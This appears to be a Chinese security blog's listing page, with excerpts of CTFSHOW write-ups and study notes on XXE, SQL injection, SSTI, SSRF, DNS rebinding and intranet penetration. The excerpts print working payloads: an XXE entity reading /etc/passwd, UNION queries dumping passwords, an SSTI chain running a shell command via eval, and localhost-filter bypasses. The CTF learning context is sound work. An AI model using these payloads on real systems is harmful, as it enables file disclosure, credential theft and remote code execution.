- 博客(12)
- 资源 (6)
- 收藏
- 关注
原创 CTFSHOW—XXE
(睡了一下午打算,通宵学习hhhh)web373wa1ki0g标签可以随便改,ctfshow这个不可以。!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><wa1ki0g><ctfshow>&xxe;</ctfshow></wa1ki0g>
2021-01-31 13:20:41 403
原创 CTFSHOW—sql注入
171order by 判断下再union select联合查询下,数据库,表,列,字段flag在password字段里-1’ union select 1,2,password from ctfshow_user --+172与171一样,多加了个表少了个列而已-1’ union select username,password from ctfshow_user2 --+173同上1’ union select id,username,password from ctfshow_us
2021-01-29 02:24:08 903
原创 内网—学习笔记
(注:以下内容大部分是看师傅们的博客为了印象更深而做的笔记,非原创)内网渗透可以大概分为三个部分:1.信息搜集+内网提权+隧道搭建2.内网横向移动3.持久化控制:后门+免杀(1)内网架构及反弹shell内网环境:域控:域控制器(Domain Controller,DC)是一台安装并运行Active Directory的服务器,它包含Active Directory数据库的可写副本,参与Active Directory复制并控制对网络资源的访问。在域中,域控制器统一管理帐户数据库、所有的用
2021-01-28 19:36:42 421
原创 代码审计—学习笔记
php弱类型extract()<?php $auth = '0'; 这里可以覆盖$auth的变量值 print_r($_GET); echo "</br>"; extract($_GET); if($auth == 1){ echo "private!"; } else{ echo "public!"; } ?>extract可
2021-01-28 11:08:55 149
原创 node.js—学习笔记
又重新找了一套视频来看,打算这回记录下笔记~第一天:node.js是什么:nodejs不是一门语言nodejs不是库,不是框架nodejs是一个js运行环境,但运行的js和浏览器中的不完全一样也就是说现在的NODEJS可以完全脱离浏览器运行,一切都归功于nodejs浏览器中的js:EcmScript(基本语法,if,var,function,Object,Array),BOM,DOMnodejs中的js:没有BOM与DOM,EcmScript,在node这个js执行环境中为js提供了一些服务
2021-01-28 01:28:02 119 1
原创 CTFSHOW-SSTI
361没发现什么过滤,直接用burp跑了下最后payload:{{().__class__.__bases__[0].__subclasses__()[80].__init__.__globals__.__builtins__['eval']("__import__('os').popen('whoami').read()")}}362同361payload
2021-01-26 18:37:49 695 1
原创 2021-01-26
ssti-bypasshttps://hetian.blog.csdn.net/article/details/111399386https://www.cnblogs.com/20175211lyz/p/11425368.htmlhttps://blog.csdn.net/miuzzx/article/details/110220425https://blog.csdn.net/solitudi/article/details/107752717
2021-01-26 09:44:03 47
原创 CTFSHOW-SSRF
CTFSHOWSSRF 351-360351url=file:var/www/html/flag.php直接读取就好352url=http://127.1.1.1:80/flag.php 过滤了locahost和127.0.0.1.服务器要是linux的话用零也可以绕过。353url=http://0x7F.0.0.1/flag.php,直接转个进制绕下354url=http://域名/flag.php 用自己的域名解析多加个127.0.0.1,自己没的话去ceye.io注册再绑定127.
2021-01-25 20:32:04 160
转载 2021-01-24
1、什么是gopher协议?2、如何使用gopher协议反弹shell?3、在SSRF中如何使用gopher协议反弹shell?本文所使用到的工具:1、curl2、nc3、docker(S2-045漏洞环境)4、phpstudy一、什么是gopher协议?定义:Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gop
2021-01-24 18:26:02 242 1
转载 idna与utf-8编码漏洞
idna与utf-8编码漏洞来自Black hat 2019原理什么是IDN?国际化域名(Internationalized Domain Name,IDN)又名特殊字符域名,是指部分或完全使用特殊文字或字母组成的互联网域名,包括中文、发育、阿拉伯语、希伯来语或拉丁字母等非英文字母,这些文字经过多字节万国码编码而成。在域名系统中,国际化域名使用punycode转写并以ASCII字符串存储。什么是idna?A library to support the Internationalised Dom
2021-01-21 13:34:26 645
转载 CGI、FastCGI和PHP-FPM关系详解
CGI、FastCGI和PHP-FPM关系详解在搭建 LAMP/LNMP 服务器时,会经常遇到 PHP-FPM、FastCGI和CGI 这几个概念。如果对它们一知半解,很难搭建出高性能的服务器。接下来我们就以图形方式,解释这些概念之间的关系。基础在整个网站架构中,Web Server(如Apache)只是内容的分发者。举个栗子,如果客户端请求的是 index.html,那么Web Server会去文件系统中找到这个文件,发送给浏览器,这里分发的是静态数据。如果请求的是 index.php,根据配置文
2021-01-21 10:29:43 122
转载 关于DNS-rebinding的总结
关于DNS-rebinding的总结一般来说浏览器通过向DNS服务器发送请求将用户输入的域名转换为ip地址,然后向对应的IP地址请求资源,最后回显给用户。这是一般过程。在说DNS rebinding之前先说下TTL的概念。TTL表示DNS里面域名和IP绑定关系的Cache在DNS上存活的最长时间。即请求了域名与iP的关系后,请求方会缓存这个关系,缓存保持的时间就是TTL。而缓存失效后就会删除,这时候如果重新访问域名指定的IP的话会重新建立匹配关系及cache。而dns就是利用这个来实现的。当用户第一次
2021-01-21 09:22:46 1750
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人